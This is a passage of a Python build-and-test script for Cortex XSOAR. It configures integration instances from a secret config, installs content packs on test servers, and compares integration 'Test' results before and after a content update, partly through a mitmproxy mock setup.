    the secret_params taken from our secret configuration file. Because there may be a number of
    configurations for a single integration (if there are values provided in our secret conf for
    multiple different instances of the same integration) then selects the parameter values for the
    configuration of the instance whose instance is in 'instance_names' (will take the last one listed
    in 'secret_params'). Note that this function does not explicitly return the modified 'integrations'
    object but rather it modifies the 'integrations' object since it is passed by reference and not by
    value, so the 'integrations' object that was passed to this function will have been changed once
    this function has completed execution and gone out of scope.
    Arguments:
        build: Build object
        integrations: (list of dicts)
            List of integration objects whose 'params' attribute will be populated in this function.
        secret_params: (list of dicts)
            List of secret configuration values for all of our integrations (as well as specific
            instances of said integrations).
        instance_names: (list)
            The names of particular instances of an integration to use the secret_params of as the
            configuration values.
        placeholders_map: (dict)
            Dict that holds the real values to be replaced for each placeholder.
        logging_module (Union[ParallelLoggingManager,logging]): The logging module to use
    Returns:
        (bool): True if integrations params were filled with secret configuration values, otherwise false
    """
    for integration in integrations:
        # all secret-conf entries for this integration, with placeholders resolved
        integration_params = [change_placeholders_to_values(placeholders_map, item) for item
                              in secret_params if item['name'] == integration['name']]
        if integration_params:
            # default to the first entry; may be overridden by an instance-name match below
            matched_integration_params = integration_params[0]
            # if there are more than one integration params, it means that there are configuration
            # values in our secret conf for multiple instances of the given integration and now we
            # need to match the configuration values to the proper instance as specified in the
            # 'instance_names' list argument
            if len(integration_params) != 1:
                found_matching_instance = False
                for item in integration_params:
                    if item.get('instance_name', 'Not Found') in instance_names:
                        # no break: the LAST matching entry in secret_params wins (documented above)
                        matched_integration_params = item
                        found_matching_instance = True
                if not found_matching_instance:
                    optional_instance_names = [optional_integration.get('instance_name', 'None')
                                               for optional_integration in integration_params]
                    failed_match_instance_msg = 'There are {} instances of {}, please select one of them by using' \
                                                ' the instance_name argument in conf.json. The options are:\n{}'
                    logging_module.error(failed_match_instance_msg.format(len(integration_params),
                                                                          integration['name'],
                                                                          '\n'.join(optional_instance_names)))
                    # ambiguous configuration aborts the whole fill operation
                    return False
            integration['params'] = matched_integration_params.get('params', {})
            integration['byoi'] = matched_integration_params.get('byoi', True)
            integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
            integration['validate_test'] = matched_integration_params.get('validate_test', True)
            # integrations not listed as unmockable are routed through the mock proxy
            # (see Build.proxy / MITMProxy); unmockable ones talk to the real endpoint
            if integration['name'] not in build.unmockable_integrations:
                integration['params'].update({'proxy': True})
                logging.debug(
                    f'Configuring integration "{integration["name"]}" with proxy=True')
            else:
                integration['params'].update({'proxy': False})
                logging.debug(
                    f'Configuring integration "{integration["name"]}" with proxy=False')
    return True
def set_module_params(param_conf, integration_params):
    """Configure a parameter object for use in a module instance.

    Fills the "value" field of the given parameter configuration object (which also
    carries fields such as "name", "display", "hasvalue", "defaultValue") from the
    integration's configured values, and returns it for use in a module instance.

    Args:
        param_conf (dict): The parameter configuration object (mutated in place).
        integration_params (dict): The values to use for an integration's parameters to configure an instance.
    Returns:
        (dict): The configured parameter object
    """
    display_matches = param_conf['display'] in integration_params
    if display_matches or param_conf['name'] in integration_params:
        # param defined in conf; the display name takes precedence as the lookup key
        key = param_conf['display'] if display_matches else param_conf['name']
        if key == 'credentials':
            # credentials are wrapped in the structure the server expects
            credentials = integration_params[key]
            param_value = {
                'credential': '',
                'identifier': credentials['identifier'],
                'password': credentials['password'],
                'passwordChanged': False
            }
        else:
            param_value = integration_params[key]
        param_conf['value'] = param_value
        param_conf['hasvalue'] = True
    elif param_conf['defaultValue']:
        # if the parameter doesn't have a value provided in the integration's configuration values
        # but does have a default value then assign it to the parameter for the module instance
        param_conf['value'] = param_conf['defaultValue']
    return param_conf
def __set_server_keys(client, integration_params, integration_name):
    """Adds server configuration keys using the demisto_client.

    Args:
        client (demisto_client): The configured client to use.
        integration_params (dict): The values to use for an integration's parameters to configure an instance.
        integration_name (str): The name of the integration which the server configurations keys are related to.
    """
    if 'server_keys' not in integration_params:
        return
    logging.info(f'Setting server keys for integration: {integration_name}')
    data = {
        'data': {key: value for key, value in integration_params.get('server_keys').items()},
        'version': -1
    }
    response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/system/config',
                                                                        method='POST', body=data)
    try:
        result_object = ast.literal_eval(response_data)
    except ValueError:
        logging.exception(f'failed to parse response from demisto. response is {response_data}')
        return
    if not 200 <= status_code < 300:
        message = result_object.get('message', '')
        logging.error(f'Failed to set server keys, status_code: {status_code}, message: {message}')
def set_integration_instance_parameters(integration_configuration,
                                        integration_params,
                                        integration_instance_name,
                                        is_byoi,
                                        client):
    """Set integration module values for integration instance creation
    The integration_configuration and integration_params should match, in that
    they are for the same integration
    Arguments:
        integration_configuration: (dict)
            dictionary of the integration configuration parameters/keys that need
            filling to instantiate an instance of a given integration
        integration_params: (dict)
            values for a given integration taken from the configuration file in
            which the secret values are stored to configure instances of various
            integrations
        integration_instance_name: (str)
            The name of the integration instance being configured if there is one
            provided in the conf.json
        is_byoi: (bool)
            If the integration is byoi or not
        client: (demisto_client)
            The client to connect to
    Returns:
        (dict): The configured module instance to send to the Demisto server for
        instantiation.
    """
    module_configuration = integration_configuration.get('configuration', {}) or []
    # explicit instance name from the conf takes precedence; otherwise derive a unique one
    if 'integrationInstanceName' in integration_params:
        instance_name = integration_params['integrationInstanceName']
    else:
        instance_name = '{}_test_{}'.format(integration_instance_name.replace(' ', '_'), str(uuid.uuid4()))
    # define module instance
    module_instance = {
        'brand': integration_configuration['name'],
        'category': integration_configuration['category'],
        'configuration': integration_configuration,
        'data': [],
        'enabled': "true",
        'engine': '',
        'id': '',
        'isIntegrationScript': is_byoi,
        'name': instance_name,
        'passwordProtected': False,
        'version': 0
    }
    # set server keys
    __set_server_keys(client, integration_params, integration_configuration['name'])
    # set module params
    module_instance['data'] = [set_module_params(param_conf, integration_params)
                               for param_conf in module_configuration]
    return module_instance
def group_integrations(integrations, skipped_integrations_conf, new_integrations_names, modified_integrations_names):
    """
    Filter integrations into their respective lists - new, modified or unchanged. if it's on the skip list, then
    skip if random tests were chosen then we may be configuring integrations that are neither new or modified.
    Args:
        integrations (list): The integrations to categorize.
        skipped_integrations_conf (dict): Integrations that are on the skip list.
        new_integrations_names (list): The names of new integrations.
        modified_integrations_names (list): The names of modified integrations.
    Returns:
        (tuple): Lists of integrations objects as well as an Integration-to-Status dictionary useful for logs.
    """
    new_integrations = []
    modified_integrations = []
    unchanged_integrations = []
    integration_to_status = {}
    for integration in integrations:
        name = integration.get('name', '')
        if name in skipped_integrations_conf:
            # skipped integrations are dropped from every bucket
            continue
        if name in new_integrations_names:
            new_integrations.append(integration)
        elif name in modified_integrations_names:
            modified_integrations.append(integration)
            integration_to_status[name] = 'Modified Integration'
        else:
            unchanged_integrations.append(integration)
            integration_to_status[name] = 'Unchanged Integration'
    return new_integrations, modified_integrations, unchanged_integrations, integration_to_status
def get_integrations_for_test(test, skipped_integrations_conf):
    """Return a list of integration objects that are necessary for a test (excluding integrations on the skip list).
    Args:
        test (dict): Test dictionary from the conf.json file containing the playbookID, integrations and
            instance names.
        skipped_integrations_conf (dict): Skipped integrations dictionary with integration names as keys and
            the skip reason as values.
    Returns:
        (list): List of integration objects to configure.
    """
    integrations_conf = test.get('integrations', [])
    if not isinstance(integrations_conf, list):
        # a single integration may be given as a bare string
        integrations_conf = [integrations_conf]
    integrations = []
    for integration in integrations_conf:
        if integration in skipped_integrations_conf:
            continue
        integrations.append({'name': integration, 'params': {}})
    return integrations
def update_content_on_demisto_instance(client, server, ami_name):
    """Try to update the content
    Args:
        client (demisto_client): The configured client to use.
        server (str): The server url to pass to Tests/update_content_data.py
        ami_name (str): The role name of the machine; selects the installed-content endpoint
            and decides whether a failed update aborts the process.
    """
    content_zip_path = 'artifacts/all_content.zip'
    update_content(content_zip_path, server=server, client=client)
    # Check if content update has finished installing
    sleep_interval = 20
    updating_content = is_content_update_in_progress(client)
    # poll until the server reports the installation is no longer in progress
    while updating_content.lower() == 'true':
        sleep(sleep_interval)
        updating_content = is_content_update_in_progress(client)
    if updating_content.lower() == 'request unsuccessful':
        # since the request to check if content update installation finished didn't work, can't use that mechanism
        # to check and just try sleeping for 30 seconds instead to allow for content update installation to complete
        logging.debug('Request to install content was unsuccessful, sleeping for 30 seconds and retrying')
        sleep(30)
    else:
        # check that the content installation updated
        # verify the asset id matches the circleci build number / asset_id in the content-descriptor.json
        release, asset_id = get_content_version_details(client, ami_name)
        with open('content-descriptor.json', 'r') as cd_file:
            cd_json = json.loads(cd_file.read())
        cd_release = cd_json.get('release')
        cd_asset_id = cd_json.get('assetId')
        if release == cd_release and asset_id == cd_asset_id:
            logging.success(f'Content Update Successfully Installed on server {server}.')
        else:
            logging.error(
                f'Content Update to version: {release} was Unsuccessful:\nAttempted to install content with release '
                f'"{cd_release}" and assetId "{cd_asset_id}" but release "{release}" and assetId "{asset_id}" '
                f'were retrieved from the instance post installation.')
            if ami_name not in MARKET_PLACE_MACHINES:
                # hard-exit the whole process so the build step fails immediately
                os._exit(1)
def report_tests_status(preupdate_fails, postupdate_fails, preupdate_success, postupdate_success,
                        new_integrations_names):
    """Log the outcome of the pre/post content-update "Test" button runs and decide success.

    Args:
        preupdate_fails (set): (instance_name, integration_name) tuples whose "Test" button
            failed before content was updated on the demisto instance.
        postupdate_fails (set): tuples that failed after the content update.
        preupdate_success (set): tuples that succeeded before the content update.
        postupdate_success (set): tuples that succeeded after the content update.
        new_integrations_names (list): Names of integrations that are new since the last official
            content release and only exist on the instance after the update.

    Returns:
        (bool): False if there were integration instances that succeeded prior to the content
        update and then failed after content was updated, otherwise True.
    """
    def _describe(pairs):
        # one log line per (instance, integration) pair
        return "\n".join(
            f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
            for instance_name, integration_of_instance in pairs)

    testing_status = True
    # a "Test" can be either successful both before and after content update (succeeded_pre_and_post),
    # fail on one of them (mismatched_statuses), or on both (failed_pre_and_post)
    succeeded_pre_and_post = preupdate_success.intersection(postupdate_success)
    if succeeded_pre_and_post:
        succeeded_pre_and_post_string = _describe(succeeded_pre_and_post)
        logging.success(
            'Integration instances that had ("Test" Button) succeeded both before and after the content update:\n'
            f'{succeeded_pre_and_post_string}')
    failed_pre_and_post = preupdate_fails.intersection(postupdate_fails)
    mismatched_statuses = postupdate_fails - preupdate_fails
    failed_only_after_update = []
    failed_but_is_new = []
    for instance_name, integration_of_instance in mismatched_statuses:
        # a brand-new integration failing is only a warning, not a build breaker
        if integration_of_instance in new_integrations_names:
            failed_but_is_new.append((instance_name, integration_of_instance))
        else:
            failed_only_after_update.append((instance_name, integration_of_instance))
    # warnings but won't fail the build step
    if failed_but_is_new:
        failed_but_is_new_string = _describe(failed_but_is_new)
        logging.warning(f'New Integrations ("Test" Button) Failures:\n{failed_but_is_new_string}')
    if failed_pre_and_post:
        failed_pre_and_post_string = _describe(failed_pre_and_post)
        logging.warning(f'Integration instances that had ("Test" Button) failures '
                        f'both before and after the content update:\n{pformat(failed_pre_and_post_string)}')
    # fail the step if there are instances that only failed after content was updated
    if failed_only_after_update:
        failed_only_after_update_string = _describe(failed_only_after_update)
        testing_status = False
        logging.critical('Integration instances that had ("Test" Button) failures only after content was updated:\n'
                         f'{pformat(failed_only_after_update_string)}.\n'
                         f'This indicates that your updates introduced breaking changes to the integration.')
    return testing_status
def get_env_conf():
    """Return the environment configuration for the current run mode.

    On CircleCI the configuration is loaded from the env-results JSON file;
    for local/other-server runs a hard-coded single-server entry is returned
    (edit the placeholders between the START/END markers when running locally).
    Returns None for an unrecognized run environment.
    """
    run_env = Build.run_environment
    if run_env == Running.CIRCLECI_RUN:
        return get_json_file(Build.env_results_path)
    if run_env == Running.WITH_LOCAL_SERVER:
        # START CHANGE ON LOCAL RUN #
        return [{
            "InstanceDNS": "http://localhost:8080",
            "Role": "Server Master"  # e.g. 'Server Master'
        }]
    if run_env == Running.WITH_OTHER_SERVER:
        return [{
            "InstanceDNS": "DNS NANE",  # without http prefix
            "Role": "DEMISTO EVN"  # e.g. 'Server Master'
        }]
    # END CHANGE ON LOCAL RUN #
def map_server_to_port(env_results, instance_role):
    """Map each matching server's DNS name to its tunnel port.

    Arguments:
        env_results: (list)
            Entries from env_results.json in server.
        instance_role: (str)
            The amazon machine image environment whose IP we should connect to.
    Returns:
        (dict): Mapping of InstanceDNS -> TunnelPort for every entry whose
        'Role' contains instance_role. (The original docstring said "(lst)",
        but the function has always returned a dict.)
    """
    return {env.get('InstanceDNS'): env.get('TunnelPort')
            for env in env_results if instance_role in env.get('Role', '')}
def get_json_file(path):
    """Read and deserialize the JSON file at `path`.

    Args:
        path: Filesystem path of a JSON file.
    Returns:
        The deserialized JSON content.
    """
    with open(path, 'r') as json_file:
        # json.load reads the stream directly; no need for loads(read()).
        return json.load(json_file)
def configure_servers_and_restart(build):
    """Apply version-dependent server configurations to every build server.

    Configurations are accumulated per server based on the server's numeric
    version, then applied in one call. Servers restart automatically unless
    this is a local run, in which case the operator restarts manually.

    Args:
        build: Build object holding the servers and the server version.
    """
    # Local servers can't be restarted remotely; prompt the operator instead.
    manual_restart = Build.run_environment == Running.WITH_LOCAL_SERVER
    for server in build.servers:
        configurations = dict()
        configure_types = []
        # <= 5.5.0: older servers must skip docker image validation.
        if LooseVersion(build.server_numeric_version) <= LooseVersion('5.5.0'):
            configure_types.append('ignore docker image validation')
            configurations.update(AVOID_DOCKER_IMAGE_VALIDATION)
            configurations.update(NO_PROXY_CONFIG)
        # >= 5.5.0: docker hardening (podman variant on RedHat instances).
        if LooseVersion(build.server_numeric_version) >= LooseVersion('5.5.0'):
            if is_redhat_instance(server.internal_ip):
                configurations.update(DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN)
                configurations.update(NO_PROXY_CONFIG)
            else:
                configurations.update(DOCKER_HARDENING_CONFIGURATION)
            configure_types.append('docker hardening')
        # >= 6.0.0: marketplace configuration as well.
        if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
            configure_types.append('marketplace')
            configurations.update(MARKET_PLACE_CONFIGURATION)
        error_msg = 'failed to set {} configurations'.format(' and '.join(configure_types))
        server.add_server_configuration(configurations, error_msg=error_msg, restart=not manual_restart)
    if manual_restart:
        input('restart your server and then press enter.')
    else:
        logging.info('Done restarting servers. Sleeping for 1 minute')
        sleep(60)
def get_tests(build: Build) -> List[str]:
    """
    Select the tests to run in this execution, filtering out those that
    cannot run on this server version.

    Args:
        build: Build object.
    Returns:
        Test configurations from conf.json that should be run in this execution.
    """
    if Build.run_environment != Running.CIRCLECI_RUN:
        # START CHANGE ON LOCAL RUN #
        return [
            {
                "playbookID": "Docker Hardening Test",
                "fromversion": "5.0.0"
            },
            {
                "integrations": "SplunkPy",
                "playbookID": "SplunkPy-Test-V2",
                "memory_threshold": 500,
                "instance_names": "use_default_handler"
            }
        ]
        # END CHANGE ON LOCAL RUN #
    filtered_tests = extract_filtered_tests()
    if build.is_nightly:
        # skip test button testing
        logging.debug('Not running instance tests in nightly flow')
        chosen = []
    elif filtered_tests:
        chosen = [test for test in build.tests if test.get('playbookID', '') in filtered_tests]
    else:
        chosen = build.tests
    return filter_tests_with_incompatible_version(chosen, build.server_numeric_version)
def get_changed_integrations(build: Build) -> tuple:
    """
    Collect the integrations added or modified since the git_sha1 commit.

    Args:
        build: the build object.
    Returns:
        A tuple of (new integration names, modified integration names).
    """
    if build.is_private:
        new_files, modified_files = [], []
    else:
        new_files, modified_files = get_new_and_modified_integration_files(build.branch_name)
    new_names, modified_names = [], []
    if new_files:
        new_names = get_integration_names_from_files(new_files)
        logging.debug(f'New Integrations Since Last Release:\n{new_names}')
    if modified_files:
        modified_names = get_integration_names_from_files(modified_files)
        logging.debug(f'Updated Integrations Since Last Release:\n{modified_names}')
    return new_names, modified_names
def get_pack_ids_to_install():
    """Return the pack ids to install: from the CI artifact file on CircleCI,
    otherwise the hard-coded local list below."""
    if Build.run_environment != Running.CIRCLECI_RUN:
        # START CHANGE ON LOCAL RUN #
        return [
            'SplunkPy'
        ]
        # END CHANGE ON LOCAL RUN #
    with open('./Tests/content_packs_to_install.txt', 'r') as packs_stream:
        return [line.rstrip('\n') for line in packs_stream]
def nightly_install_packs(build, install_method=install_all_content_packs, pack_path=None, service_account=None):
    """Run `install_method` concurrently against every server in the build.

    Args:
        build: Build object holding the servers.
        install_method: Callable invoked per server with client/host kwargs.
        pack_path: Optional pack path forwarded to the install method.
        service_account: Optional service account forwarded to the install method.
    """
    workers = []
    for server in build.servers:
        kwargs = {'client': server.client, 'host': server.internal_ip}
        if service_account:
            kwargs['service_account'] = service_account
        if pack_path:
            kwargs['pack_path'] = pack_path
        workers.append(Thread(target=install_method, kwargs=kwargs))
    run_threads_list(workers)
def install_nightly_pack(build):
    """Install all content packs for the nightly build, then build and upload
    the zipped test pack to every server.

    Args:
        build: Build object holding the servers and the service account.
    """
    nightly_install_packs(build, install_method=install_all_content_packs_for_nightly,
                          service_account=build.service_account)
    create_nightly_test_pack()
    nightly_install_packs(build, install_method=upload_zipped_packs,
                          pack_path=f'{Build.test_pack_target}/test_pack.zip')
    # Give the async pack installation time to settle before proceeding.
    logging.info('Sleeping for 45 seconds while installing nightly packs')
    sleep(45)
def install_packs(build, pack_ids=None):
    """Search for and install the given packs (and dependencies) on every server.

    Args:
        build: Build object holding the servers.
        pack_ids: Pack ids to install; defaults to get_pack_ids_to_install().
    Returns:
        True when installation succeeded on every server, False otherwise.
    """
    if pack_ids is None:
        pack_ids = get_pack_ids_to_install()
    all_succeeded = True
    for server in build.servers:
        try:
            _, flag = search_and_install_packs_and_their_dependencies(pack_ids, server.client)
            if not flag:
                raise Exception('Failed to search and install packs.')
        except Exception:
            logging.exception('Failed to search and install packs')
            all_succeeded = False
    return all_succeeded
def configure_server_instances(build: Build, tests_for_iteration, all_new_integrations, modified_integrations):
    """Configure the integration instances required by the given tests.

    Args:
        build: Build object.
        tests_for_iteration: Test configurations whose integrations should be configured.
        all_new_integrations: Names of all integrations new in this build.
        modified_integrations: Names of all integrations modified in this build.
    Returns:
        A tuple of (instances of modified/unchanged integrations, instances of
        new integrations) that were successfully configured.
    """
    modified_module_instances = []
    new_module_instances = []
    testing_client = build.servers[0].client
    for test in tests_for_iteration:
        integrations = get_integrations_for_test(test, build.skipped_integrations_conf)
        playbook_id = test.get('playbookID')
        # BUGFIX: the per-test grouping results get their own names. The
        # original code rebound the `modified_integrations` parameter here, so
        # from the second test onward group_integrations() received the
        # previous test's subset instead of the build-wide modified list.
        new_ints, modified_ints, unchanged_ints, integration_to_status = group_integrations(
            integrations, build.skipped_integrations_conf, all_new_integrations, modified_integrations
        )
        integration_to_status_string = '\n\t\t\t\t\t\t'.join(
            [f'"{key}" - {val}' for key, val in integration_to_status.items()])
        if integration_to_status_string:
            logging.info(f'All Integrations for test "{playbook_id}":\n\t\t\t\t\t\t{integration_to_status_string}')
        else:
            logging.info(f'No Integrations for test "{playbook_id}"')
        instance_names_conf = test.get('instance_names', [])
        if not isinstance(instance_names_conf, list):
            instance_names_conf = [instance_names_conf]
        integrations_to_configure = modified_ints[:]
        integrations_to_configure.extend(unchanged_ints)
        placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
        new_ints_params_set = set_integration_params(build,
                                                     new_ints,
                                                     build.secret_conf['integrations'],
                                                     instance_names_conf,
                                                     placeholders_map)
        ints_to_configure_params_set = set_integration_params(build,
                                                              integrations_to_configure,
                                                              build.secret_conf['integrations'],
                                                              instance_names_conf, placeholders_map)
        if not new_ints_params_set:
            logging.error(f'failed setting parameters for integrations: {new_ints}')
        if not ints_to_configure_params_set:
            logging.error(f'failed setting parameters for integrations: {integrations_to_configure}')
        # Skip this test entirely if either parameter set could not be built.
        if not (new_ints_params_set and ints_to_configure_params_set):
            continue
        modified_module_instances_for_test, new_module_instances_for_test = configure_modified_and_new_integrations(
            build,
            integrations_to_configure,
            new_ints,
            testing_client)
        modified_module_instances.extend(modified_module_instances_for_test)
        new_module_instances.extend(new_module_instances_for_test)
    return modified_module_instances, new_module_instances
def configure_modified_and_new_integrations(build: Build,
                                            modified_integrations_to_configure: list,
                                            new_integrations_to_configure: list,
                                            demisto_client: demisto_client) -> tuple:
    """
    Configure old and new integrations on the server behind demisto_client.

    Args:
        build: The build object.
        modified_integrations_to_configure: Integrations that already exist.
        new_integrations_to_configure: Integrations created in this build.
        demisto_client: A demisto client.
    Returns:
        A tuple with two lists:
        1. Configured instances of modified integrations.
        2. Configured instances of new integrations.
    """
    def _configure_all(integrations):
        # Configure each integration on the first build server; integrations
        # that fail to configure are silently skipped (None result).
        instances = []
        for integration in integrations:
            placeholders = {'%%SERVER_HOST%%': build.servers[0]}
            instance = configure_integration_instance(integration, demisto_client, placeholders)
            if instance:
                instances.append(instance)
        return instances

    return (_configure_all(modified_integrations_to_configure),
            _configure_all(new_integrations_to_configure))
def instance_testing(build: Build,
                     all_module_instances: list,
                     pre_update: bool,
                     use_mock: bool = True) -> Tuple[set, set]:
    """
    Run the 'test-module' command for every instance in `all_module_instances`.

    Args:
        build: An object containing the current build info.
        all_module_instances: The integration instances that should be tested.
        pre_update: Whether this testing happens before or after the content update.
        use_mock: Whether to use mock while testing mockable integrations. Should
                  be mainly False in private-content builds, which don't use mocks.
    Returns:
        A set of (instance name, integration name) pairs that succeeded,
        and a set of pairs that failed.
    """
    phase = 'Pre' if pre_update else 'Post'
    successful_tests: set = set()
    failed_tests: set = set()
    if all_module_instances:
        # only print start message if there are instances to test
        logging.info(f'Start of Instance Testing ("Test" button) ({phase}-update)')
    else:
        logging.info(f'No integrations to configure for the chosen tests. ({phase}-update)')
    for instance in all_module_instances:
        brand = instance.get('brand', '')
        name = instance.get('name', '')
        # If there is a failure, __test_integration_instance will print it
        if use_mock and brand not in build.unmockable_integrations:
            success = test_integration_with_mock(build, instance, pre_update)
        else:
            client = build.servers[0].reconnect_client()
            success, _ = __test_integration_instance(client, instance)
        target = successful_tests if success else failed_tests
        target.add((name, brand))
    return successful_tests, failed_tests
def test_integration_with_mock(build: Build, instance: dict, pre_update: bool):
    """
    Runs 'test-module' for given integration with mitmproxy.
    In case the playback mode fails and this is a pre-update run - a record attempt will be executed.
    Args:
        build: An object containing the current build info.
        instance: A dict containing the instance details.
        pre_update: Whether this instance testing is before or after the content update on the server.
    Returns:
        The result of running the 'test-module' command for the given integration.
        If a record was executed - will return the result of the 'test-module' with the record mode only.
    """
    testing_client = build.servers[0].reconnect_client()
    integration_of_instance = instance.get('brand', '')
    logging.debug(f'Integration "{integration_of_instance}" is mockable, running test-module with mitmproxy')
    has_mock_file = build.proxy.has_mock_file(integration_of_instance)
    success = False
    # First attempt: play back the existing mock file, if there is one.
    if has_mock_file:
        with run_with_mock(build.proxy, integration_of_instance) as result_holder:
            success, _ = __test_integration_instance(testing_client, instance)
            result_holder[RESULT] = success
            if not success:
                logging.warning(f'Running test-module for "{integration_of_instance}" has failed in playback mode')
    # Post-update runs with no (working) mock file fall back to recording a
    # fresh one; the record-mode result becomes the returned status.
    if not success and not pre_update:
        logging.debug(f'Recording a mock file for integration "{integration_of_instance}".')
        with run_with_mock(build.proxy, integration_of_instance, record=True) as result_holder:
            success, _ = __test_integration_instance(testing_client, instance)
            result_holder[RESULT] = success
            if not success:
                logging.debug(f'Record mode for integration "{integration_of_instance}" has failed.')
    return success
def update_content_till_v6(build: Build):
    """Update content on every build server in parallel (pre-6.0 flow)."""
    workers = [
        Thread(target=update_content_on_demisto_instance,
               kwargs={'client': server.client, 'server': server.internal_ip, 'ami_name': build.ami_env})
        for server in build.servers
    ]
    run_threads_list(workers)
def disable_instances(build: Build):
    """Disable every configured integration instance on each build server, so
    leftover instances from previous runs don't interfere with this one."""
    for server in build.servers:
        disable_all_integrations(server.client)
def create_nightly_test_pack():
    """Zip all test playbooks and scripts into test_pack.zip under the
    configured target directory (see test_pack_zip)."""
    test_pack_zip(Build.content_path, Build.test_pack_target)
def test_files(content_path):
    """Yield (path, os.DirEntry) for every test playbook file under all packs.

    Scans <content_path>/Packs/*/TestPlaybooks and each TestPlaybooks/
    NonCircleTests subdirectory, skipping packs listed in SKIPPED_PACKS.

    Args:
        content_path: Root of the content repository.
    """
    packs_root = f'{content_path}/Packs'
    packs = filter(lambda x: x.is_dir(), os.scandir(packs_root))
    for pack_dir in packs:
        # BUGFIX: compare by name — pack_dir is an os.DirEntry, so the original
        # `pack_dir in SKIPPED_PACKS` never matched the pack-name strings and
        # skipped packs were scanned anyway.
        if pack_dir.name in SKIPPED_PACKS:
            continue
        playbooks_root = f'{pack_dir.path}/TestPlaybooks'
        if os.path.isdir(playbooks_root):
            for playbook_path, playbook in get_test_playbooks_in_dir(playbooks_root):
                yield playbook_path, playbook
        if os.path.isdir(f'{playbooks_root}/NonCircleTests'):
            for playbook_path, playbook in get_test_playbooks_in_dir(f'{playbooks_root}/NonCircleTests'):
                yield playbook_path, playbook
def get_test_playbooks_in_dir(path):
    """Yield (path, os.DirEntry) for every regular file directly under `path`."""
    for entry in os.scandir(path):
        if entry.is_file():
            yield entry.path, entry
def test_pack_metadata():
    """Build the metadata.json contents for the generated nightly test pack.

    Returns:
        A JSON string (indent=4) describing the pack, timestamped with the
        current time (second precision, 'Z' suffix) and a fresh UUID id.
    """
    timestamp = datetime.now().isoformat(timespec='seconds') + 'Z'
    metadata = {
        "name": "nightly test",
        "id": str(uuid.uuid4()),
        "description": "nightly test pack (all test playbooks and scripts).",
        "created": timestamp,
        "updated": timestamp,
        "legacy": True,
        "support": "Cortex XSOAR",
        "supportDetails": {},
        "author": "Cortex XSOAR",
        "authorImage": "",
        "certification": "certified",
        "price": 0,
        "serverMinVersion": "6.0.0",
        "serverLicense": "",
        "currentVersion": "1.0.0",
        "general": [],
        "tags": [],
        "categories": [
            "Forensics & Malware Analysis"
        ],
        "contentItems": {},
        "integrations": [],
        "useCases": [],
        "keywords": [],
        "dependencies": {}
    }
    return json.dumps(metadata, indent=4)
def test_pack_zip(content_path, target):
    """Zip every test playbook/script YAML under `content_path` into
    <target>/test_pack.zip, together with a generated metadata.json.

    Files whose names don't already start with 'playbook-' or 'script-' get a
    type prefix derived from their YAML content via find_type.

    Args:
        content_path: Root of the content repository.
        target: Directory in which test_pack.zip is created.
    """
    with zipfile.ZipFile(f'{target}/test_pack.zip', 'w', zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr('test_pack/metadata.json', test_pack_metadata())
        for test_path, test in test_files(content_path):
            if not test_path.endswith('.yml'):
                continue
            test = test.name
            with open(test_path, 'r') as test_file:
                if not (test.startswith('playbook-') or test.startswith('script-')):
                    # Determine the content type from the YAML body, then rewind
                    # so the whole file can still be copied into the zip.
                    test_type = find_type(_dict=yaml.safe_load(test_file), file_type='yml').value
                    test_file.seek(0)
                    test_target = f'test_pack/TestPlaybooks/{test_type}-{test}'
                else:
                    test_target = f'test_pack/TestPlaybooks/{test}'
                zip_file.writestr(test_target, test_file.read())
def get_non_added_packs_ids(build: Build):
    """
    :param build: the build object
    :return: all non added packs i.e. unchanged packs (dependencies) and modified packs
    """
    # On master itself, diff against the previous master commit.
    compare_against = 'origin/master~1' if build.branch_name == 'master' else 'origin/master'
    diff_output = run_command(f'git diff --name-only --diff-filter=A '
                              f'{compare_against}..refs/heads/{build.branch_name} -- Packs/*/pack_metadata.json')
    added_pack_ids = {line.split('/')[1] for line in diff_output.split('\n') if line}
    return set(get_pack_ids_to_install()) - added_pack_ids
def set_marketplace_url(servers, branch_name, ci_build_number):
    """Point every server's marketplace bootstrap URL at this build's GCS
    bucket path and restart the servers."""
    bucket_url = ('https://storage.googleapis.com/marketplace-ci-build/content/builds/'
                  f'{branch_name}/{ci_build_number}')
    config = {'marketplace.bootstrap.bypass.url': bucket_url}
    for server in servers:
        server.add_server_configuration(config, 'failed to configure marketplace custom url ', True)
    logging.success('Updated marketplace url and restarted servers')
    logging.info('sleeping for 60 seconds')
    sleep(60)
@run_with_proxy_configured
def test_integrations_post_update(build: Build, new_module_instances: list, modified_module_instances: list) -> tuple:
    """
    Run 'test-module' on all integration instances for the post-update check.

    Args:
        build: A build object.
        new_module_instances: New integration instances to run test-module on.
        modified_module_instances: Existing integration instances to run test-module on.
    Returns:
        A tuple of (succeeded post-update tests, failed post-update tests).
    """
    # Note: extends the caller's list in place, matching the original behavior.
    all_instances = modified_module_instances
    all_instances.extend(new_module_instances)
    return instance_testing(build, all_instances, pre_update=False)
def update_content_on_servers(build: Build) -> bool:
    """
    Update content on the build's servers according to the server version.

    Args:
        build: Build object.
    Returns:
        Whether the content installation succeeded. Pre-6.0 servers always
        return True (the legacy update path reports no status); 6.0+ non-nightly
        builds return the pack-installation result.
    """
    if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
        update_content_till_v6(build)
        return True
    if not build.is_nightly:
        set_marketplace_url(build.servers, build.branch_name, build.ci_build_number)
        return install_packs(build)
    return True
@run_with_proxy_configured
def configure_and_test_integrations_pre_update(build: Build, new_integrations, modified_integrations) -> tuple:
    """
    Configure the integration instances that exist in the current version and
    run 'test-module' on each of them.

    Args:
        build: Build object.
        new_integrations: Names of new integrations.
        modified_integrations: Names of modified integrations.
    Returns:
        A tuple of:
        * configured instances of modified integrations
        * configured instances of new integrations
        * integrations that failed the pre-update 'test-module' run
        * integrations that succeeded the pre-update 'test-module' run
    """
    tests = get_tests(build)
    modified_instances, new_instances = configure_server_instances(build,
                                                                   tests,
                                                                   new_integrations,
                                                                   modified_integrations)
    succeeded, failed = instance_testing(build, modified_instances, pre_update=True)
    return modified_instances, new_instances, failed, succeeded
def install_packs_pre_update(build: Build) -> bool:
    """
    Install packs on the server according to the server version.

    Args:
        build: A build object.
    Returns:
        Whether the installation succeeded. Pre-6.0 servers skip installation
        and report False; nightly and private builds report True without a
        pack-search step.
    """
